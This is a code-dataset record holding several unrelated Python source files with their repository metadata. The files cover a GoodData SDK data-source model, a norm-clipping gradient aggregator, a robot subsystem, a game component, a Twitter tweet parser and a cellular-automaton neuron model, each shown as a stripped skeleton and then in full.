df4d4a4d730ab376960ae2ed01e7d86498e85c6a
|
[
"MIT"
] | 7
|
2022-01-24T16:27:06.000Z
|
2022-02-25T10:18:49.000Z
|
gooddata-sdk/gooddata_sdk/catalog/data_source/declarative_model/data_source.py
|
gooddata/gooddata-python-sdk
|
df4d4a4d730ab376960ae2ed01e7d86498e85c6a
|
[
"MIT"
] | 29
|
2022-01-20T15:45:38.000Z
|
2022-03-31T09:39:25.000Z
|
gooddata-sdk/gooddata_sdk/catalog/data_source/declarative_model/data_source.py
|
gooddata/gooddata-python-sdk
|
df4d4a4d730ab376960ae2ed01e7d86498e85c6a
|
[
"MIT"
] | 7
|
2022-01-20T07:11:15.000Z
|
2022-03-09T14:50:17.000Z
|
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import Any, List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_data_source import DeclarativeDataSource
from gooddata_metadata_client.model.declarative_data_sources import DeclarativeDataSources
from gooddata_scan_client.model.test_definition_request import TestDefinitionRequest
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.data_source.declarative_model.physical_model.pdm import CatalogDeclarativeTables
from gooddata_sdk.catalog.entity import TokenCredentialsFromFile
from gooddata_sdk.catalog.permissions.permission import CatalogDeclarativeDataSourcePermission
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
BIGQUERY_TYPE = "BIGQUERY"
LAYOUT_DATA_SOURCES_DIR = "data_sources"
@attr.s(auto_attribs=True, kw_only=True)
@attr.s(auto_attribs=True, kw_only=True)
| 42.699248
| 113
| 0.728649
|
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import Any, List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_data_source import DeclarativeDataSource
from gooddata_metadata_client.model.declarative_data_sources import DeclarativeDataSources
from gooddata_scan_client.model.test_definition_request import TestDefinitionRequest
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.data_source.declarative_model.physical_model.pdm import CatalogDeclarativeTables
from gooddata_sdk.catalog.entity import TokenCredentialsFromFile
from gooddata_sdk.catalog.permissions.permission import CatalogDeclarativeDataSourcePermission
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
BIGQUERY_TYPE = "BIGQUERY"
LAYOUT_DATA_SOURCES_DIR = "data_sources"
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeDataSources(Base):
data_sources: List[CatalogDeclarativeDataSource]
def to_api(self, credentials: dict[str, Any] = None) -> DeclarativeDataSources:
data_sources = []
client_class = self.client_class()
credentials = credentials if credentials is not None else dict()
for data_source in self.data_sources:
if data_source.id in credentials:
if data_source.type == BIGQUERY_TYPE:
token = TokenCredentialsFromFile.token_from_file(credentials[data_source.id])
data_sources.append(data_source.to_api(token=token))
else:
data_sources.append(data_source.to_api(password=credentials[data_source.id]))
else:
data_sources.append(data_source.to_api())
return client_class(data_sources=data_sources)
@staticmethod
def client_class() -> Type[DeclarativeDataSources]:
return DeclarativeDataSources
@staticmethod
def data_sources_folder(layout_organization_folder: Path) -> Path:
return layout_organization_folder / LAYOUT_DATA_SOURCES_DIR
def store_to_disk(self, layout_organization_folder: Path) -> None:
data_sources_folder = self.data_sources_folder(layout_organization_folder)
create_directory(data_sources_folder)
for data_source in self.data_sources:
data_source.store_to_disk(data_sources_folder)
@classmethod
def load_from_disk(cls, layout_organization_folder: Path) -> CatalogDeclarativeDataSources:
data_sources_folder = cls.data_sources_folder(layout_organization_folder)
data_source_ids = sorted([p.stem for p in data_sources_folder.iterdir() if p.is_dir()])
data_sources = []
for data_source_id in data_source_ids:
data_sources.append(CatalogDeclarativeDataSource.load_from_disk(data_sources_folder, data_source_id))
return cls(data_sources=data_sources)
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeDataSource(Base):
id: str
type: str
name: str
url: str
schema: str
enable_caching: Optional[bool] = None
pdm: Optional[CatalogDeclarativeTables] = None
cache_path: Optional[List[str]] = None
username: Optional[str] = None
permissions: List[CatalogDeclarativeDataSourcePermission] = []
def to_test_request(
self,
password: Optional[str] = None,
token: Optional[str] = None,
) -> TestDefinitionRequest:
kwargs: dict[str, Any] = {"schema": self.schema}
if password is not None:
kwargs["password"] = password
if token is not None:
kwargs["token"] = token
if self.username is not None:
kwargs["username"] = self.username
return TestDefinitionRequest(type=self.type, url=self.url, **kwargs)
@staticmethod
def client_class() -> Type[DeclarativeDataSource]:
return DeclarativeDataSource
@staticmethod
def data_source_folder(data_sources_folder: Path, data_source_id: str) -> Path:
data_source_folder = data_sources_folder / data_source_id
create_directory(data_source_folder)
return data_source_folder
def to_api(
self, password: Optional[str] = None, token: Optional[str] = None, include_nested_structures: bool = True
) -> DeclarativeDataSource:
dictionary = self._get_snake_dict()
if not include_nested_structures:
del dictionary["pdm"]
if password is not None:
dictionary["password"] = password
if token is not None:
dictionary["token"] = token
return self.client_class().from_dict(dictionary)
def store_to_disk(self, data_sources_folder: Path) -> None:
data_source_folder = self.data_source_folder(data_sources_folder, self.id)
file_path = data_source_folder / f"{self.id}.yaml"
data_source_dict = self.to_api(include_nested_structures=False).to_dict(camel_case=True)
write_layout_to_file(file_path, data_source_dict)
if self.pdm is not None:
self.pdm.store_to_disk(data_source_folder)
@classmethod
def load_from_disk(cls, data_sources_folder: Path, data_source_id: str) -> CatalogDeclarativeDataSource:
data_source_folder = data_sources_folder / data_source_id
data_source_file_path = data_source_folder / f"{data_source_id}.yaml"
pdm = CatalogDeclarativeTables.load_from_disk(data_source_folder)
data_source_dict = read_layout_from_file(data_source_file_path)
data_source = CatalogDeclarativeDataSource.from_dict(data_source_dict)
data_source.pdm = pdm
return data_source
| 3,856
| 804
| 44
|
ce36ea79006e4c6ff0cb9ffe5a3b3419b733b588
| 1,321
|
py
|
Python
|
src/aggregation_manager/norm_clipping.py
|
anishacharya/BGMD
|
03dee098217d2b9a209fea5759e2e0a2237390a5
|
[
"MIT"
] | 5
|
2022-01-21T06:21:51.000Z
|
2022-02-11T23:00:57.000Z
|
src/aggregation_manager/norm_clipping.py
|
anishacharya/BGMD
|
03dee098217d2b9a209fea5759e2e0a2237390a5
|
[
"MIT"
] | null | null | null |
src/aggregation_manager/norm_clipping.py
|
anishacharya/BGMD
|
03dee098217d2b9a209fea5759e2e0a2237390a5
|
[
"MIT"
] | null | null | null |
# Copyright (c) Anish Acharya.
# Licensed under the MIT License
import numpy as np
from .base_gar import GAR
from typing import List
"""
Ghosh et.al. Communication-Efficient and Byzantine-Robust Distributed Learning with Error Feedback
"""
| 32.219512
| 98
| 0.632097
|
# Copyright (c) Anish Acharya.
# Licensed under the MIT License
import numpy as np
from .base_gar import GAR
from typing import List
"""
Ghosh et.al. Communication-Efficient and Byzantine-Robust Distributed Learning with Error Feedback
"""
class NormClipping(GAR):
def __init__(self, aggregation_config):
GAR.__init__(self, aggregation_config=aggregation_config)
# Find Number of top norms to drop
self.alpha = self.aggregation_config.get("norm_clip_config", {}).get("alpha", 0.1)
self.k = None
def aggregate(self, G: np.ndarray, ix: List[int] = None, axis=0) -> np.ndarray:
# Compute norms of each gradient vector
# norm_dist = np.linalg.norm(G, axis=1)
if self.k is None:
self.k = int(G.shape[0] * self.alpha)
print('Norm clipping {} clients'.format(self.k))
norms = np.sqrt(np.einsum('ij,ij->i', G, G))
top_k_indices = np.argsort(np.abs(norms))[::-1][:self.k]
# set weights of them to 0 filtering k top ones based on norm
alphas = np.ones(G.shape[0]) * (1 / (G.shape[0] - self.k))
alphas[top_k_indices] = 0
agg_grad = self.weighted_average(stacked_grad=G, alphas=alphas)
if ix is not None:
return agg_grad[ix]
else:
return agg_grad
| 998
| 3
| 77
|
fd042e0095f353ffb4caebc0a7ea0f6645226317
| 1,157
|
py
|
Python
|
src/saas/bkuser_shell/config_center/constants.py
|
Chace-wang/bk-user
|
057f270d66a1834312306c9fba1f4e95521f10b1
|
[
"MIT"
] | null | null | null |
src/saas/bkuser_shell/config_center/constants.py
|
Chace-wang/bk-user
|
057f270d66a1834312306c9fba1f4e95521f10b1
|
[
"MIT"
] | null | null | null |
src/saas/bkuser_shell/config_center/constants.py
|
Chace-wang/bk-user
|
057f270d66a1834312306c9fba1f4e95521f10b1
|
[
"MIT"
] | 1
|
2021-12-31T06:48:41.000Z
|
2021-12-31T06:48:41.000Z
|
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from bkuser_shell.common.constants import ChoicesEnum
from django.utils.translation import ugettext_lazy as _
| 39.896552
| 115
| 0.71478
|
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from bkuser_shell.common.constants import ChoicesEnum
from django.utils.translation import ugettext_lazy as _
class DynamicFieldTypeEnum(ChoicesEnum):
STRING = "string"
ONE_ENUM = "one_enum"
MULTI_ENUM = "multi_enum"
NUMBER = "number"
TIMER = "timer"
_choices_labels = (
(STRING, _("字符串")),
(ONE_ENUM, _("枚举")),
(MULTI_ENUM, _("多枚举")),
(NUMBER, _("数值")),
(TIMER, _("日期")),
)
| 0
| 336
| 23
|
3345d41bb3626517b8edf0dd1361709a68331cf3
| 1,611
|
py
|
Python
|
src/subsystems/climbroller.py
|
creikey/DeepSpace2019
|
454453aec745df6b1d4e7cfa5222ac46af338a84
|
[
"MIT"
] | 2
|
2021-12-08T05:02:28.000Z
|
2021-12-29T14:47:55.000Z
|
src/subsystems/climbroller.py
|
creikey/DeepSpace2019
|
454453aec745df6b1d4e7cfa5222ac46af338a84
|
[
"MIT"
] | 19
|
2019-01-07T01:42:07.000Z
|
2019-03-08T05:38:52.000Z
|
src/subsystems/climbroller.py
|
creikey/DeepSpace2019
|
454453aec745df6b1d4e7cfa5222ac46af338a84
|
[
"MIT"
] | 7
|
2018-10-29T05:09:50.000Z
|
2020-04-16T04:04:18.000Z
|
from wpilib.command import Subsystem
from constants import Constants
from utils import singleton, lazytalonsrx
import logging
from commands import rollclimbroller
class ClimbRoller(Subsystem, metaclass=singleton.Singleton):
"""The climb roller subsystem controlls the rollers on the end of the front arm."""
def init(self):
"""Initialize the intake motors. This is not in the constructor to make the calling explicit in the robotInit to the robot simulator."""
self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.CRL_MOTOR_ID)
self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.CRR_MOTOR_ID)
self.l_motor.initialize(
inverted=False, encoder=False, name="Climb Roller Left")
self.r_motor.initialize(
inverted=False, encoder=False, name="Climb Roller Right")
def setPercentOutput(self, l_signal, r_signal):
"""Set the percent output of the 2 motors."""
self.l_motor.setPercentOutput(l_signal, max_signal=1)
self.r_motor.setPercentOutput(r_signal, max_signal=1)
def roll(self, signal):
"""Move the rollers at the same speed."""
if(signal > 0):
logging.warn("Will not roll climb rollers backwards")
return
self.setPercentOutput(signal, signal)
def stop(self):
"""Stop the rollers."""
self.setPercentOutput(0, 0)
| 35.8
| 144
| 0.68653
|
from wpilib.command import Subsystem
from constants import Constants
from utils import singleton, lazytalonsrx
import logging
from commands import rollclimbroller
class ClimbRoller(Subsystem, metaclass=singleton.Singleton):
"""The climb roller subsystem controlls the rollers on the end of the front arm."""
def __init__(self):
super().__init__()
def init(self):
"""Initialize the intake motors. This is not in the constructor to make the calling explicit in the robotInit to the robot simulator."""
self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.CRL_MOTOR_ID)
self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.CRR_MOTOR_ID)
self.l_motor.initialize(
inverted=False, encoder=False, name="Climb Roller Left")
self.r_motor.initialize(
inverted=False, encoder=False, name="Climb Roller Right")
def outputToDashboard(self):
self.l_motor.outputToDashboard()
self.r_motor.outputToDashboard()
def setPercentOutput(self, l_signal, r_signal):
"""Set the percent output of the 2 motors."""
self.l_motor.setPercentOutput(l_signal, max_signal=1)
self.r_motor.setPercentOutput(r_signal, max_signal=1)
def roll(self, signal):
"""Move the rollers at the same speed."""
if(signal > 0):
logging.warn("Will not roll climb rollers backwards")
return
self.setPercentOutput(signal, signal)
def stop(self):
"""Stop the rollers."""
self.setPercentOutput(0, 0)
def periodic(self):
self.outputToDashboard()
| 145
| 0
| 81
|
688b529ea69dada848d8352c8c56bb04fd013fa4
| 3,164
|
py
|
Python
|
S4/S4 Library/simulation/objects/components/stereo_component.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:37.000Z
|
2021-05-20T19:33:37.000Z
|
S4/S4 Library/simulation/objects/components/stereo_component.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
S4/S4 Library/simulation/objects/components/stereo_component.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
from objects.components import Component, types, ComponentPriority
from objects.components.state import TunableStateTypeReference, TunableStateValueReference
from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, TunableList, TunableReference, Tunable
import services
import sims4.resources
from snippets import define_snippet
(_, TunableStereoComponentSnippet) = define_snippet('stereo_component', StereoComponent.TunableFactory())
| 117.185185
| 1,759
| 0.708597
|
from objects.components import Component, types, ComponentPriority
from objects.components.state import TunableStateTypeReference, TunableStateValueReference
from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, TunableList, TunableReference, Tunable
import services
import sims4.resources
from snippets import define_snippet
class StereoComponent(Component, HasTunableFactory, AutoFactoryInit, component_name=types.STEREO_COMPONENT):
FACTORY_TUNABLES = {'channel_state': TunableStateTypeReference(description='\n The state used to populate the radio stations'), 'off_state': TunableStateValueReference(description='\n The channel that represents the off state.'), 'listen_affordances': TunableList(description='\n An ordered list of affordances that define "listening" to this\n stereo. The first succeeding affordance is used.\n ', tunable=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.INTERACTION), pack_safe=True)), 'play_on_active_sim_only': Tunable(description='\n If enabled, and audio target is Sim, the audio will only be \n played on selected Sim. Otherwise it will be played regardless \n Sim is selected or not.\n \n If audio target is Object, always set this to False. Otherwise\n the audio will never be played.\n \n ex. This will be useful for Earbuds where we want to hear the\n music only when the Sim is selected.\n \n This is passed down to the audio state when it is triggered, and thus\n will overwrite any tuning on the state value.\n ', tunable_type=bool, default=False), 'immediate': Tunable(description='\n If checked, this audio will be triggered immediately, nothing\n will block.\n \n ex. Earbuds audio will be played immediately while \n the Sim is routing or animating.\n \n This is passed down to the audio state when it is triggered, and thus\n will overwrite any tuning on the state value.\n ', tunable_type=bool, default=False)}
def is_stereo_turned_on(self):
current_channel = self.owner.get_state(self.channel_state)
return current_channel != self.off_state
def get_available_picker_channel_states(self, context):
for client_state in self.owner.get_client_states(self.channel_state):
if client_state.show_in_picker:
if client_state.test_channel(self.owner, context):
yield client_state
def component_potential_interactions_gen(self, context, **kwargs):
current_channel = self.owner.get_state(self.channel_state)
if current_channel != self.off_state:
for listen_affordance in self.listen_affordances:
yield from listen_affordance.potential_interactions(self.owner, context, required_station=current_channel, off_state=self.off_state, **kwargs)
(_, TunableStereoComponentSnippet) = define_snippet('stereo_component', StereoComponent.TunableFactory())
| 766
| 1,928
| 23
|
603ff613688cffe6ba5669264455c110de9a9652
| 1,274
|
py
|
Python
|
programs/koinos-types/koinos_reflect/baseparser.py
|
joticajulian/koinos-types
|
7d01248437d063deb780af03057737e4937f82d1
|
[
"MIT"
] | 10
|
2021-02-10T20:57:08.000Z
|
2021-03-17T00:09:15.000Z
|
programs/koinos-types/koinos_reflect/baseparser.py
|
joticajulian/koinos-types
|
7d01248437d063deb780af03057737e4937f82d1
|
[
"MIT"
] | 82
|
2021-02-08T22:59:24.000Z
|
2021-10-01T17:40:07.000Z
|
programs/koinos-types/koinos_reflect/baseparser.py
|
joticajulian/koinos-types
|
7d01248437d063deb780af03057737e4937f82d1
|
[
"MIT"
] | 3
|
2021-02-11T04:29:39.000Z
|
2021-04-17T22:56:34.000Z
|
from .lexer import Lexer
from dataclasses_json import dataclass_json
from dataclasses import dataclass, field
from typing import List, Tuple, Union
# Parser of .base files
# Syntax is semicolon separated list of qualified types
@dataclass_json
@dataclass
@dataclass_json
@dataclass
| 23.163636
| 64
| 0.605965
|
from .lexer import Lexer
from dataclasses_json import dataclass_json
from dataclasses import dataclass, field
from typing import List, Tuple, Union
# Parser of .base files
# Syntax is semicolon separated list of qualified types
@dataclass_json
@dataclass
class BasefileType:
name: List[str]
doc: str
@dataclass_json
@dataclass
class BasefileTop:
types: List[BasefileType]
doc: str
class BasefileParser:
def __init__(self, data):
self.lexer = Lexer(data)
def parse(self):
return self.parse_toplevel()
def parse_typelist(self):
result = []
while True:
tok = self.peek()
if tok.ttype == "EOF":
break
elif tok.ttype == "SEMI":
self.expect("SEMI")
continue
name = self.parse_qualname()
semi = self.expect("SEMI")
result.append(BasefileType(name=name, doc=semi.doc))
return result
def parse_qualname(self):
result = []
result.append(self.expect("ID").text)
while self.peek().ttype == "QUAL":
self.expect("QUAL")
result.append(self.expect("ID").text)
return result
def parse(data):
return BasefileParser(data).parse()
| 718
| 71
| 197
|
9ab9dde5ff068e3fbee8407c86a3718d396063cf
| 2,372
|
py
|
Python
|
tests/correctness/targets/CppCompilationWithTargetDeps/Input/root.xpybuild.py
|
xpybuild/xpybuild
|
c71a73e47414871c8192381d0356ab62f5a58127
|
[
"Apache-2.0"
] | 9
|
2017-02-06T16:45:46.000Z
|
2021-12-05T09:42:58.000Z
|
tests/correctness/targets/CppCompilationWithTargetDeps/Input/root.xpybuild.py
|
xpybuild/xpybuild
|
c71a73e47414871c8192381d0356ab62f5a58127
|
[
"Apache-2.0"
] | 15
|
2019-01-11T19:39:34.000Z
|
2022-01-08T11:11:35.000Z
|
tests/correctness/targets/CppCompilationWithTargetDeps/Input/root.xpybuild.py
|
xpybuild/xpybuild
|
c71a73e47414871c8192381d0356ab62f5a58127
|
[
"Apache-2.0"
] | 5
|
2017-02-06T16:51:17.000Z
|
2020-12-02T17:36:30.000Z
|
#
# Copyright (c) 2013 - 2017, 2019 Software AG, Darmstadt, Germany and/or its licensors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from xpybuild.propertysupport import *
from xpybuild.buildcommon import *
from xpybuild.pathsets import *
from xpybuild.targets.native import *
from xpybuild.targets.copy import Copy
from xpybuild.utils.compilers import GCC, VisualStudio
include(os.environ['PYSYS_TEST_ROOT_DIR']+'/build_utilities/native_config.xpybuild.py')
setGlobalOption('native.include.upToDateCheckIgnoreRegex', '(c:/program files.*|.*/tESt4.h)' if IS_WINDOWS else '.*/test4.h')
setGlobalOption('native.include.upToDateCheckIgnoreSystemHeaders', True) # only works on linux/gcc currently
Copy('${OUTPUT_DIR}/my-generated-include-files/', FindPaths('./include-src/'))
Copy('${OUTPUT_DIR}/my-generated-include-files2/generatedpath/test3.h', FindPaths('./include-src/generatedpath/'))
Copy('${OUTPUT_DIR}/test-generated.cpp', './test.cpp')
Cpp(objectname('${OUTPUT_DIR}/no-target-deps'), './test.cpp',
includes=[
"./include/",
'./include-src/',
]
)
Cpp(objectname('${OUTPUT_DIR}/target-cpp-and-include-dir'), '${OUTPUT_DIR}/test-generated.cpp',
includes=[
"./include/",
'${OUTPUT_DIR}/my-generated-include-files/', # a target
]
)
Cpp(objectname('${OUTPUT_DIR}/target-cpp'), '${OUTPUT_DIR}/test-generated.cpp',
includes=[
"./include/",
'./include-src/',
]
)
Cpp(objectname('${OUTPUT_DIR}/target-include-dir'), './test.cpp',
includes=[
"./include/",
'${OUTPUT_DIR}/my-generated-include-files/', # a target
]
)
# generated include files in non-target directories are no longer supported
Cpp(objectname('${OUTPUT_DIR}/target-include-file'), './test.cpp',
includes=[
"./include/",
TargetsWithinDir('${OUTPUT_DIR}/my-generated-include-files2/'), # NOT a target, but contains one
]
)
| 33.885714
| 125
| 0.718381
|
#
# Copyright (c) 2013 - 2017, 2019 Software AG, Darmstadt, Germany and/or its licensors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from xpybuild.propertysupport import *
from xpybuild.buildcommon import *
from xpybuild.pathsets import *
from xpybuild.targets.native import *
from xpybuild.targets.copy import Copy
from xpybuild.utils.compilers import GCC, VisualStudio
include(os.environ['PYSYS_TEST_ROOT_DIR']+'/build_utilities/native_config.xpybuild.py')
setGlobalOption('native.include.upToDateCheckIgnoreRegex', '(c:/program files.*|.*/tESt4.h)' if IS_WINDOWS else '.*/test4.h')
setGlobalOption('native.include.upToDateCheckIgnoreSystemHeaders', True) # only works on linux/gcc currently
Copy('${OUTPUT_DIR}/my-generated-include-files/', FindPaths('./include-src/'))
Copy('${OUTPUT_DIR}/my-generated-include-files2/generatedpath/test3.h', FindPaths('./include-src/generatedpath/'))
Copy('${OUTPUT_DIR}/test-generated.cpp', './test.cpp')
Cpp(objectname('${OUTPUT_DIR}/no-target-deps'), './test.cpp',
includes=[
"./include/",
'./include-src/',
]
)
Cpp(objectname('${OUTPUT_DIR}/target-cpp-and-include-dir'), '${OUTPUT_DIR}/test-generated.cpp',
includes=[
"./include/",
'${OUTPUT_DIR}/my-generated-include-files/', # a target
]
)
Cpp(objectname('${OUTPUT_DIR}/target-cpp'), '${OUTPUT_DIR}/test-generated.cpp',
includes=[
"./include/",
'./include-src/',
]
)
Cpp(objectname('${OUTPUT_DIR}/target-include-dir'), './test.cpp',
includes=[
"./include/",
'${OUTPUT_DIR}/my-generated-include-files/', # a target
]
)
# generated include files in non-target directories are no longer supported
Cpp(objectname('${OUTPUT_DIR}/target-include-file'), './test.cpp',
includes=[
"./include/",
TargetsWithinDir('${OUTPUT_DIR}/my-generated-include-files2/'), # NOT a target, but contains one
]
)
| 0
| 0
| 0
|
a1a87cc46f9c970e2f28007cb3e1126704e78b89
| 3,842
|
py
|
Python
|
twirps/classes/tweet.py
|
condnsdmatters/twirps
|
e2a15ae21129fedb400415ad1b70f6a931b046c4
|
[
"MIT"
] | 3
|
2015-05-08T16:19:40.000Z
|
2016-05-03T07:54:04.000Z
|
twirps/classes/tweet.py
|
condnsdmatters/twirps
|
e2a15ae21129fedb400415ad1b70f6a931b046c4
|
[
"MIT"
] | null | null | null |
twirps/classes/tweet.py
|
condnsdmatters/twirps
|
e2a15ae21129fedb400415ad1b70f6a931b046c4
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
import logging
LOGGER = logging.getLogger(__name__)
| 35.247706
| 118
| 0.61114
|
from __future__ import unicode_literals
import logging
LOGGER = logging.getLogger(__name__)
class Tweet(object):
def __init__(self, tweet, source):
self.tweet_id = 0
self.user_id = 0
self.handle = ''
self.mentions = []
self.content = ''
self.is_retweet = False
self.retweeted_user=None
self.retweet_status_id = 0
self.is_reply = False
self.in_reply_to_user = None
self.in_reply_to_status_id = None
self.retweet_count = 0
self.favourite_count = 0
self.hashtags = []
self.date = ''
self.urls = []
self.website_link = None
if source=='twitter':
self.from_twitter(tweet)
elif source=='database':
self.from_database(tweet)
def from_twitter(self, tweet):
self.tweet_id = tweet.id
self.user_id = tweet.user.id
self.handle = tweet.user.screen_name
self.date = tweet.created_at
self.retweet_count = tweet.retweet_count
self.favourite_count = tweet.favorite_count
self.website_link=u'https://twitter.com/'+self.handle+u'/status/'+str(self.tweet_id)
if tweet.in_reply_to_user_id != None:
#self.mentions.append((tweet.in_reply_to_user_id, tweet.in_reply_to_screen_name))
self.is_reply = True
self.in_reply_to_user = (tweet.in_reply_to_user_id,tweet.in_reply_to_screen_name)
self.in_reply_to_status_id = tweet.in_reply_to_status_id
if hasattr(tweet, 'retweeted_status'):
tweet = tweet.retweeted_status
self.retweeted_user = (tweet.user.id, tweet.user.screen_name)
self.is_retweet = True
self.retweet_status_id = tweet.id
# self.retweeted_uid = tweet.user.id
# self.mentions.append((tweet.user.id, tweet.user.screen_name))
self.content = tweet.text
self.mentions = [ (ent['id'],ent['screen_name']
) for ent in tweet.entities['user_mentions']]
self.hashtags = [ent['text'] for ent in tweet.entities['hashtags']]
self.urls = [urls['expanded_url'] for urls in tweet.entities['urls']]
def __str__(self):
return u'Tweet: %d %s || RC: %d || FC: %d || RT: %s || @ %s || # %s || Url %s\nContent: %s' %(
self.tweet_id, self.handle, self.retweet_count, self.favourite_count,
self.retweeted_user[1] if self.is_retweet else '', len(self.mentions), len(self.hashtags), len(self.urls),
unicode(self.content) )
def from_database(self, tweet_tuple):
self.tweet_id = tweet_tuple[0]
self.user_id = tweet_tuple[1]
self.handle = tweet_tuple[2].decode('utf-8')
self.is_retweet = tweet_tuple[3]
self.is_reply = tweet_tuple[4]
self.content = tweet_tuple[5].decode('utf-8')
self.favourite_count = tweet_tuple[6]
self.retweet_count = tweet_tuple[7]
self.date =tweet_tuple[8]
self.website_link=u'https://twitter.com/'+self.handle+u'/status/'+str(self.tweet_id)
self.from_database_add_entities(tweet_tuple)
def from_database_add_entities(self, tweet_tuple):
if tweet_tuple[9] == 'hashtag':
self.hashtags.append( tweet_tuple[10].decode('utf-8') )
elif tweet_tuple[9] == 'url':
self.urls.append( tweet_tuple[10] )
elif tweet_tuple[9] == 'mention':
self.mentions.append( (tweet_tuple[11],tweet_tuple[10].decode('utf-8')) )
elif tweet_tuple[9] == 'retweet':
self.retweeted_user = (tweet_tuple[11],tweet_tuple[10].decode('utf-8') )
elif tweet_tuple[9] == 'reply':
self.in_reply_to_user = (tweet_tuple[11],tweet_tuple[10].decode('utf-8') )
| 3,578
| -1
| 157
|
e6443063857f8fb51ef5d2e6135b5f0c53f6f899
| 200
|
py
|
Python
|
code/tools/idl/header.py
|
antonand03/hello-my-friend
|
fb4e225a75aea3007a391ccc4dcda3eda65c2142
|
[
"MIT"
] | 5,411
|
2017-04-14T08:57:56.000Z
|
2022-03-30T19:35:15.000Z
|
code/tools/idl/header.py
|
antonand03/hello-my-friend
|
fb4e225a75aea3007a391ccc4dcda3eda65c2142
|
[
"MIT"
] | 802
|
2017-04-21T14:18:36.000Z
|
2022-03-31T21:20:48.000Z
|
code/tools/idl/header.py
|
antonand03/hello-my-friend
|
fb4e225a75aea3007a391ccc4dcda3eda65c2142
|
[
"MIT"
] | 2,011
|
2017-04-14T09:44:15.000Z
|
2022-03-31T15:40:39.000Z
|
# add dependency directory to the Python path
import site
import os.path
site.addsitedir(os.path.join(os.path.dirname(__file__), 'deps'))
# call header.py
from xpidl import header
header.main()
| 20
| 64
| 0.755
|
# add dependency directory to the Python path
import site
import os.path
site.addsitedir(os.path.join(os.path.dirname(__file__), 'deps'))
# call header.py
from xpidl import header
header.main()
| 0
| 0
| 0
|
8954b1341863a803d5c1520e4ecd7f34aaffdd4d
| 1,476
|
py
|
Python
|
snim/cell.py
|
markormerod/simple-neural-ignition-model
|
70867d66fefd237cdc2cb9a6318c5a7782759d59
|
[
"MIT"
] | null | null | null |
snim/cell.py
|
markormerod/simple-neural-ignition-model
|
70867d66fefd237cdc2cb9a6318c5a7782759d59
|
[
"MIT"
] | null | null | null |
snim/cell.py
|
markormerod/simple-neural-ignition-model
|
70867d66fefd237cdc2cb9a6318c5a7782759d59
|
[
"MIT"
] | null | null | null |
from snim.snim_state import SnimState
| 35.142857
| 94
| 0.590108
|
from snim.snim_state import SnimState
class Cell:
def __init__(self, x, y, state = SnimState.EMPTY):
self.x = x
self.y = y
self.state = state
def update(self, snim):
neighbours = snim.get_diag_neighbours(self.x, self.y)
neural_neighbours = sum(1 for n in neighbours if n.state is not SnimState.EMPTY)
firing_neighbours = sum(1 for n in neighbours if n.state is SnimState.FIRING)
if self.state is SnimState.EMPTY:
# If all of the surrounding cells are living, spawn a new neuron
if neural_neighbours is 4:
self.state = SnimState.RESTING
return
if self.state is SnimState.FIRING:
# If firing and there are no surrounding living cells, can't discharge so stay lit
if neural_neighbours < 1:
self.state = SnimState.FIRING
return
self.state = SnimState.RECOVERING
return
if self.state is SnimState.RECOVERING:
# If recovering and over 2 neighbours are firing, reignite
if firing_neighbours > 2:
self.state = SnimState.FIRING
return
self.state = SnimState.RESTING
return
if self.state is SnimState.RESTING:
# If resting and any neighbours fire, ignite
if firing_neighbours >= 1:
self.state = SnimState.FIRING
return
| 1,373
| -10
| 76
|
